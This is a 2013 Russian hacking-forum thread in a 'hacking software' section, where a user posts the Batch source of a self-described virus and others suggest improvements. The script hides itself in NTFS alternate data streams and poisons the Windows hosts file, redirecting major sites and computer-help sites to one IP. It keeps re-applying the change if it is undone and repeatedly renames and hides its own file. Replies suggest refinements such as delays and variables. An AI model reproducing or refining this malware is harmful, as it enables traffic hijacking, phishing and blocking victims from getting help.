1. Пост двух одинаковых тем в разных разделах - бан.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

hosts вирус на Batch.

Тема в разделе "Софт для взлома", создана пользователем MihaniX, 26 авг 2013.

  1. MihaniX
    MihaniX Новичок
    Симпатии:
    2
    :: - знак начала комментария. cmd не обращает на них внимания.

    ADS - альтернативные файловые потоки. подробнее тут: http://www.forensicfocus.com/dissecting-ntfs-hidden-streams

    ВИРУС НЕ ТЕСТИРОВАЛСЯ! СДЕЛАН ПО ТЕОРИИ. ТЕСТИРОВАЛИСЬ ОТДЕЛЬНЫЕ КОМПОНЕНТЫ.

    @echo off
    ::без комментариев :)
    move %0 %windir%\System32\WindowsPowerShell\v1.0\en-US\
    cd %windir%\System32\WindowsPowerShell\v1.0\en-US\
    ::перемещаем вирус в указанный каталог и переходим в него
    :regen
    more > :stream1.bat
    ::записываем в ADS к каталогу в котором мы находимся файл stream1.bat
    @echo off
    echo 62.212.83.1 www.mail.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.google.com >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.2ip.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.cyberforum.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.helpprofi.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.deeppro.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.help-it.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.help-user.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.tracklab.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.webalta.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.computer-help.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.01comp.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.setup-pk.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.rambler.ru >> %windir%\system32\drivers\etc\hosts
    echo 62.212.83.1 www.vk.com >> %windir%\system32\drivers\etc\hosts
    ::записываем нужные строки в хосты (айпи слева то куда переадресовываем, имя сайта справа - откуда переадресовываем)
    type %windir%\system32\drivers\etc\hosts > C:\:stream2
    ::сохраняем резервную копию файла hosts в ADS
    :chek
    fc /b "%windir%\system32\drivers\etc\hosts" "C:\:stream2 || (
    type C:\:stream2 > C:\Windows\system32\drivers\etc\hosts
    )
    ::постоянно проверяем наличие изменений в hosts. если находим - отменяем.
    goto chek
    ::записали.
    ^Z
    start < :stream1.bat
    ::запускаем stream1.bat
    :find
    ren %0 %random%
    attrib +h +s +r %0
    if not exist C:\:stream1.bat goto regen
    goto find
    ::тут видите, цикл: файл постоянно меняет название на рандомное и добавляет себе атрибуты: системный, скрытый только чтение. а если наш файл с вирусом в ADS вдруг отсутствует переходит на метку REGEN и заново записывает наш вирус.

    =========
    Мой первый более менее серьезный вирус. Не судите строго :)
     
    Последнее редактирование: 27 авг 2013
    26 авг 2013
    1 человеку нравится это.
  2. FanOfGun
    FanOfGun Продвинутый
    Симпатии:
    15
    есть такой замечательный макрос %windir%, который раскрывается в путь до папки винды, советую использовать его, т..к у меня винда одно время стояла на d: диске, лучше создать отдельную переменную(%ip%, например) и держать там твой ip'шник(гугли batch set, если че), назначение последнего цикла немного не понятно, это логическая бомба? если да, то лучше взять файл побольше(из папки винды, например) и кидать в рандомные папки
     
    26 авг 2013
    1 человеку нравится это.
  3. MihaniX
    MihaniX Новичок
    Симпатии:
    2
    Все заменил на %windir%. Кстати вроде %systemroot% туде же раскрывается.

    Назначение последнего цикла - постоянно меняет свое название и если не находит :stream1.bat идет его восстанавливать.
     
    27 авг 2013
    1 человеку нравится это.
  4. FanOfGun
    FanOfGun Продвинутый
    Симпатии:
    15
    это я понял, но этот цикл сгенерирует овер9000 файлов вида 425, 6456, 6456 и с пому подобными именами. это бессмысленно, если это не логическая бомба. они просто лежат. ничего не делают. просто занимают место. и рекомндую таки его протестировать, он скорей всего (почти 100%) не сработает так, как задумывалось
     
    27 авг 2013
  5. MihaniX
    MihaniX Новичок
    Симпатии:
    2
    Всмысле? Написано же if not exist. Т.е. если нужный нам файлик не существует - записываем заново.
     
    28 авг 2013
  6. FanOfGun
    FanOfGun Продвинутый
    Симпатии:
    15
    я о строчках
    Код:
    ren %0 %random%
     attrib +h +s +r %0
    они здесь не нужны, они просто засоряют текущую папку кучей скрытых копий %0
    плюс твой цикл отхавает одно ядро без проблем, нужно вставить что-то вроде
    Код:
    ping -n 4 0.0.0.0 > nul
    (может немного не так, не помню какие точно параметры нужны) что бы сделать небольшую задержку(вроде с полсекунды выходило) между проверками
     
    29 авг 2013
  7. airstrike
    airstrike Новичок
    Симпатии:
    1
    Пауза на 1 секунду:
    ping 127.0.0.1 -n 1 > nul
     
    29 авг 2013
  8. donseo
    donseo Новичок
    Симпатии:
    0
    Щас так просто в хост не добраться как я понял. )))
    Почти все проги фиксят доступ к нему.
     
    27 сен 2013

Поделиться этой страницей

Загрузка...